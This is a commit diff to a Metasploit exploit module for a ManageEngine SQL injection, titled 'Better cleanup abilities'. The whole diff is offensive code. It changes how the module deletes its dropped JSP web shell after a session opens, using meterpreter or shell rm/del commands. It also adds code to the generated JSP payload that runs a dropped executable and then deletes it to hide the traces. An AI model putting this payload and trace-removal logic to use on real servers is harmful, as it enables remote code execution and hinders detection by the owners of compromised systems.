Better cleanup abilities

Author: sinn3r

modules/exploits/multi/http/manageengine_search_sqli.rb

@@ -68,16 +68,26 @@ def check
 	# We cannot delete the executable because it will still be in use.
 	#
 	def on_new_session(cli)
-		if cli.type != 'meterpreter'
-			print_warning("Meterpreter not used. Please manually remove #{@jsp_name + '.jsp'}")
-			return
+		if target['Platform'] == 'linux'
+			print_warning("Malicious executable is removed during payload execution")
 		end
 
-		cli.core.use("stdapi") if not cli.ext.aliases.include?("stdapi")
+		if cli.type == 'meterpreter'
+			cli.core.use("stdapi") if not cli.ext.aliases.include?("stdapi")
+		end
 
 		begin
+			path = "../webapps/SecurityManager/#{@jsp_name + '.jsp'}"
 			print_warning("#{rhost}:#{rport} - Deleting: #{@jsp_name + '.jsp'}")
-			cli.fs.file.rm("../webapps/SecurityManager/#{@jsp_name + '.jsp'}")
+
+			if cli.type == 'meterpreter'
+				cli.fs.file.rm(path)
+			else
+				del_cmd = (target['Platform'] == 'linux') ? 'rm' : 'del'
+				path = path.gsub(/\//, '\\') if target['Platform'] == 'win'
+				cli.shell_command_token("#{del_cmd} \"#{path}\"")
+			end
+
 			print_good("#{rhost}:#{rport} - #{@jsp_name + '.jsp'} deleted")
 		rescue ::Exception => e
 			print_error("Unable to delete #{@jsp_name + '.jsp'}: #{e.message}")
@@ -107,8 +117,15 @@ def generate_jsp_payload
 			Process #{var_proc1} = Runtime.getRuntime().exec("chmod 777 " + #{var_path});
 			Thread.sleep(200);
 			|
+
+			var_proc3 = Rex::Text.rand_text_alpha(rand(8) + 3)
+			cleanup = %Q|
+			Thread.sleep(200);
+			Process #{var_proc3} = Runtime.getRuntime().exec("rm " + #{var_path});
+			|
 		else
-			chmod = ''
+			chmod   = ''
+			cleanup = ''
 		end
 
 		jsp = %Q|
@@ -132,6 +149,7 @@ def generate_jsp_payload
 			#{var_ostream}.close();
 			#{chmod}
 			Process #{var_proc2} = Runtime.getRuntime().exec(#{var_path});
+			#{cleanup}
 		} catch (Exception e) {
 		}
 		%>